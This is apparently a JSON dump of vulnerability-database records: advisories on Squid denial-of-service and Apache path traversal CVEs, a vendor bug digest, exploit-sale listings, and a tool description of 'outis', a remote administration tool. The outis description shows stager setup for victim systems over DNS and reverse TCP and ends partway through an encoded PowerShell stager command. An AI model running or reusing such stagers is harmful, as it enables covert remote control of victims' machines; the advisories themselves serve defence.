"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-14T21:08:26", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-06-14T11:23:57", "id": "VERACODE:30435", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30435/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T16:52:25", "description": "squid is vulnerable to denial of service (DoS). The vulnerability exists through an improper input validation, affecting all clients using the proxy.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-14T21:08:30", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-06-14T11:25:30", "id": "VERACODE:30436", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30436/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-08-16T19:28:11", "description": "Apache HTTP Server is vulnerable to path traversal attacks. An attacker could use a path traversal attack to map URLs to the files outside of the document root are not protected by the \u201crequire all denied\u201d directive in the Apache configuration file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T21:08:53", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-15T14:29:33", "id": "VERACODE:32442", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32442/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:33:44", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Open Management Infrastructure Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-20T07:00:00", "id": "MS:CVE-2021-38647", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-09-24T22:25:49", "description": "[7:3.5.20-17.0.1]\n- Mutiple CVE fixes for squid [Orabug: 33146289]\n- Resolves: CVE-2021-28651 squid: Bug 5104: Memory leak in RFC 2169 response parsing (#778)\n- Resolves: CVE-2021-28652 squid: Bug 5106: Broken cache manager URL parsing (#788)\n- Resolves: CVE-2021-31806,31807,31808 squid: Handle more Range requests (#790)\n- Resolves: CVE-2021-33620 squid: Handle more partial responses (#791)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-24T00:00:00", "type": "oraclelinux", "title": "squid security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-09-24T00:00:00", "id": "ELSA-2021-9465", "href": "http://linux.oracle.com/errata/ELSA-2021-9465.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2022-01-04T14:41:02", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2685-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nJune 14, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : squid3\nVersion : 3.5.23-5+deb9u7\nCVE ID : CVE-2021-28651 CVE-2021-28652 CVE-2021-31806 CVE-2021-31807 \n CVE-2021-31808 CVE-2021-33620\n\nSeveral vulnerabilities were discovered in Squid, a proxy caching \nserver. \n\nCVE-2021-28651\n\n Due to a buffer-management bug, it allows a denial of service. \n When resolving a request with the urn: scheme, the parser leaks a \n small amount of memory. However, there is an unspecified attack \n methodology that can easily trigger a large amount of memory \n consumption.\n\nCVE-2021-28652\n\n Due to incorrect parser validation, it allows a Denial of Service \n attack against the Cache Manager API. This allows a trusted client \n to trigger memory leaks that. over time, lead to a Denial of \n Service via an unspecified short query string. This attack is \n limited to clients with Cache Manager API access privilege.\n\nCVE-2021-31806\n\n Due to a memory-management bug, it is vulnerable to a Denial of \n Service attack (against all clients using the proxy) via HTTP \n Range request processing.\n\nCVE-2021-31807\n\n An integer overflow problem allows a remote server to achieve \n Denial of Service when delivering responses to HTTP Range \n requests. The issue trigger is a header that can be expected to \n exist in HTTP traffic without any malicious intent.\n\nCVE-2021-31808\n\n Due to an input-validation bug, it is vulnerable to a Denial of \n Service attack (against all clients using the proxy). A client \n sends an HTTP Range request to trigger this.\n\nCVE-2021-33620\n\n Remote servers to cause a denial of service (affecting \n availability to all clients) via an HTTP response. The issue \n trigger is a header that can be expected to exist in HTTP traffic \n without any malicious intent by the server.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-14T06:36:59", "type": "debian", "title": "[SECURITY] [DLA 2685-1] squid3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-06-14T06:36:59", "id": "DEBIAN:DLA-2685-1:9A36F", "href": "https://lists.debian.org/debian-lts-announce/2021/06/msg00014.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-16T23:32:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4924-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 01, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : squid\nCVE ID : CVE-2021-28651 CVE-2021-28652 CVE-2021-28662 CVE-2021-31806 \n CVE-2021-31807 CVE-2021-31808\nDebian Bug : 988891 988892 988893 989043\n\nMultiple denial of service vulnerabilities were discovered in the Squid\nproxy caching server.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.6-1+deb10u6.\n\nWe recommend that you upgrade your squid packages.\n\nFor the detailed security status of squid please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-01T19:38:13", "type": "debian", "title": "[SECURITY] [DSA 4924-1] squid security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-28662", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808"], "modified": "2021-06-01T19:38:13", "id": "DEBIAN:DSA-4924-1:931B6", "href": "https://lists.debian.org/debian-security-announce/2021/msg00107.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "trellix": [{"lastseen": "2021-11-02T00:00:00", "description": "#### ARCHIVED STORY\n\n# The Bug Report \u2013 October Edition\n\nBy **Douglas McKee ** \u00b7 November 02, 2021\n\n## Your Cyber Security Comic Relief\n\n\n\n**Figure 1. Apache server version 2.4.50 (CVE-2021-42013)**\n\n## Why am I here?\n\nRegardless of the origins, you\u2019ve arrived at Advanced Threat Research team\u2019s monthly bug digest \u2013 an overview of what we believe to be the most noteworthy vulnerabilities over the last month. We don\u2019t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. If you don\u2019t agree with these picks, we encourage you to write a strongly worded letter to your local senator. In lieu of that, we present our top CVEs from the last month.\n\n### Apache: CVE-2021-41773 and CVE-2021-42013\n\n**What is it?** \n2 CVES / 1 Vuln \u2013 It appears Apache struggled a bit with this latest critical vulnerability, where it took two tries to fix a basic **path traversal bug,** which was introduced while patching last month\u2019s [SSRF mod_proxy vulnerability](<https://vulners.com/cve/CVE-2021-40438>). As path traversal bugs do, this allows unauthorized users to access files outside the expected document root on the web server. But wait, there\u2019s more! This can lead **to remote code execution** provided mod-cgi is enabled on the server.\n\n**Who cares?** \nA quick Shodan scan told me there are at least 111,000 server admins that should care! With Apache being the [second largest market](<https://w3techs.com/technologies/overview/web_server>) share holder of implemented webservers, there is a good chance your organization is using it somewhere. It\u2019s always important to consider both internal and external facing assets when looking at your exposure. Apache is even commonly used as an embedded webserver to other applications and should be reviewed for use in any installed 3rd party applications. Oh yeah \u2013 and if you overlook an instance you have installed somewhere, this IS currently **being actively exploited in the wild \u2013 no pressure**.\n\n**What can I do?** \nOh! I know, use Microsoft IIS! If you\u2019re not ready to completely abandon your webserver implementation, I suggest updating to **Apache 2.4.51**. Remember to **avoid version 2.4.50** as it does not patch both vulnerabilities. If you have been an astute system admin and followed the [Apache documentation](<https://httpd.apache.org/docs/2.4/howto/access.html>) using the **default and pretty darn secure** \u201crequire all denied\u201d directive for all files outside the document root, kudos to you! Although patching is still highly recommended, you are not immediately vulnerable.\n\n**The Gold Standard** \nWe recognize in some special cases patching is harder than compiling gcc from source, so McAfee Enterprise has you covered; we have been detecting path traversal attacks in our **Network Security Platform (NSP)** like it was going out of style since 1990 (and it was).\n\n### Win32k Driver: CVE-2021-40449\n\n**What is it?** \nAin\u2019t nothin\u2019 free anymore! Except kernel module addresses on your Windows machines, thanks to Microsoft Windows [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>). This vulnerability is a use-after-free in the NtGdiResetDC function of the Win32k driver and can lead to attackers being able to **locally elevate their privileges**.\n\n**Who cares?** \nAre you currently reading this from a Microsoft Windows machine? Using Microsoft Server edition in your cloud? Local attacks are often given lower priority or downplayed. However, it is important to recognize that phishing attacks are still highly successfully as an initial point of entry, facilitating a need for privilege escalation bugs to obtain higher level access. So, unless you are a hardcore Linux and Mac-only shop, you may want to patch since this is **actively being exploited** by cybercriminals, according to our friends at [Kaspersky](<https://www.kaspersky.com/blog/mysterysnail-cve-2021-40449/42448/>).\n\n**What can I do?** \nThat boring **Microsoft patch** Tuesday thing still works, or you could just use a superior operating system like FreeBSD.\n\n**The Gold Standard** \nHave you checked out the latest version of **McAfee Enterprise ENS** lately? Detecting exploitation and cybercriminal activity is sort of its thing, assuming you have grabbed the latest signatures.\n\n### Apple iOS: CVE-2021-30883\n\n**What is it?** \nAn [integer overflow](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) vulnerability in the iOS \u201cIOMobileFrameBuffer\u201d component can allow an application to execute arbitrary code with kernel privileges. This has additionally been confirmed to be accessible from the browser.\n\n**Who cares?** \nSince Apple still [reportedly](<https://www.counterpointresearch.com/us-market-smartphone-share/>) holds 53% market share of all smartphone users, statistically speaking your organization should care too. It only takes one bad apple to hack your entire network, and with [reported](<https://support.apple.com/en-us/HT212846>) **active exploitation** in the wild it might happen sooner than you think.\n\n**What can I do?** \nYou should be sensing a common theme in this section \u2013 and, in this case, you actually can take action! Stop reading this, plug that mobile device into a power source, and install **the latest version of Apple iOS****.**\n\n**The Gold Standard** \nSince you stopped reading and updated already, congrats!\n", "cvss3": {}, "published": "2021-11-02T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 October Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30883", "CVE-2021-40438", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-02T00:00:00", "id": "TRELLIX:3D1BFD2AFBB082262FACCCAE2137672E", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-october-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "Remote Code Execution in Apache\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-07-16T00:00:00", "id": "E-738", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:32", "description": "Path traversal vulnerability in Apache\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "E-739", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-03-22T08:30:29", "description": "### *Detect date*:\n10/07/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerability was found in Apache HTTP Server. Malicious users can exploit this vulnerability to execute arbitrary code and obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.51\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.51>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>)7.5Critical", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "kaspersky", "title": "KLA12372 RCE vulnerability in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-21T00:00:00", "id": "KLA12372", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12372/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-11-04T08:40:00", "description": "[  ](<https://4.bp.blogspot.com/-Si8yaPUMk6A/WbnIMuc83AI/AAAAAAAAI4Q/G6AlC65nXJYeyTQmiODAwngeO5YUb9psACLcBGAs/s1600/outis.png>)\n\n \n\n\noutis is a custom [ Remote Administration Tool ](<https://www.kitploit.com/search/label/Remote%20Administration%20Tool>) (RAT) or something like that. Think [ Meterpreter ](<https://www.kitploit.com/search/label/Meterpreter>) or Empire-Agent. However, the focus of this tool is neither an exploit [ toolkit ](<https://www.kitploit.com/search/label/Toolkit>) (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. \n\n \n\n\n** On the Name **\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived. \n\nMy thanks to Marcel for remembering this marvelous piece of classic tale. \n\n \n\n\n** Dependencies for the Handler **\n\nArchlinux users can install the following packages: \n\n * python3 # includes cmd, tempfile, ... \n * python-progressbar2 \n * python-dnspython \n * python-crypto \n * python-pyopenssl \n * and maybe more... \nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. \nAlso, older versions might cause problems: \n\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows: \n \n \n $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n\nYou can set up a python virtual environment quite easily: \n\n \n \n $ virtualenv outis-venv\n $ source ./outis-venv/bin/activate\n (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n\nThis results to the following package list, which seems to work for me: \n\n \n \n $ pip freeze\n appdirs==1.4.3\n asn1crypto==0.22.0\n cffi==1.10.0\n cryptography==1.8.1\n dnspython==1.15.0\n idna==2.5\n packaging==16.8\n progressbar2==3.18.1\n pycparser==2.17\n pycrypto==2.6.1\n pyOpenSSL==16.2.0\n pyparsing==2.2.0\n python-utils==2.1.0\n six==1.10.0\n\n \n** Installation ** \nClone this git with recursive flag to also clone its submodules in the thirdpartytools folder: \n\n \n \n git clone --recursive ...\n\nThe handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. \nTo bind low ports without needing root privileges, consider using a capability wrapper. \n \n** Terms ** \n\n\n * ** agent ** : software, that runs on the victim system \n * ** handler ** : software, that parses your commands and leads the agents (usually it runs on your server) \n * ** stager ** : short script that downloads the agent (using the transport module) and runs it \n * ** transport ** : communication channel between stager/agent and handler, e.g. ReverseTCP \n * ** platform ** : victim architecture to use for stager/agent scripts, e.g. PowerShell \n \n** Currently Supported Plattforms ** \n\n\n * PowerShell (partial) \n \n** Currently Supported Transports ** \n\n\n * Reverse TCP \n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) \n \n** Currently Supported Cryptography ** \n\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR \n * Agent stages can be authenticated using RSA signatures and pinned certificates \n * Transport connections can be encrypted / authenticated using TLS and pinned certificates \n \n** Currently Supported Commands and Controls ** \n\n\n * ping requests to test the connection (partial) \n * text message format (partial) \n * upload and download of files \n \n** Currently Supported Extras ** \n\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). \n \n** Usage Examples ** \nDownload of a file using staged DNS transport with POWERSHELL platform could look like this: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set ZONE zfs.sy.gs\n outis> set AGENTDEBUG TRUE\n outis> info\n [+] Options for the Handler:\n Name Value Required Description \n ----------------- ---------- -------- -----------------------------------------------------------------\n TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP,\n DNS)\n CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS)\n PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL)\n PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? (only if not \n debugging the relevant module) (Options: TRUE, FALSE)\n \n [+] Options for the TRANSPORT module DNS:\n Name Value Required Description \n --------- ----------- -------- ------------------------------------------------------------------------\n ZONE zfs.sy.gs True DNS Zone for handling requests\n LHOST 0.0.0.0 True Interface IP to listen on\n LPORT 53 True UDP-Port to listen on for DNS server\n DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will \n enumerate all supported types on its own) (Options: TXT, A)\n DNSSERVER False IP address of DNS server to connect for all queries\n \n [+] Options for the PLATFORM module POWERSHELL:\n Name Value Required Description \n -------------------- -------------------------- -------- ----------------------------------------------\n STAGED TRUE True Is the communication setup staged or not? \n (Options: TRUE, FALSE)\n STAGEENCODING TRUE True Should we send the staged agent in an encoded \n form (obscurity, not for security!) (Options: \n TRUE, FALSE)\n STAGEAUTHENTICATION TRUE True Should the stager verify the agent code \n before executing (RSA signature verification \n with certificate pinning) (Options: TRUE, \n FALSE)\n STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and \n certificate to sign and verify staged agent \n with (you can generate a selfsigned cert by \n using the script gencert.sh initially)\n AGENTTYPE DEFAULT True Defines which agent should be used (the \n default outis agent for this plattform, or \n some third party software we support) \n (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\n TIMEOUT 9 True Number of seconds to wait for each request \n (currently only supported by DNS stagers)\n RETRIES 2 True Retry each request for this number of times \n (currently only supported by DNS stagers)\n AGENTDEBUG TRUE True Should the agent print and log debug messages \n (Options: TRUE, FALSE)\n outis> generatestager\n [+] Use the following stager code:\n powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7\n 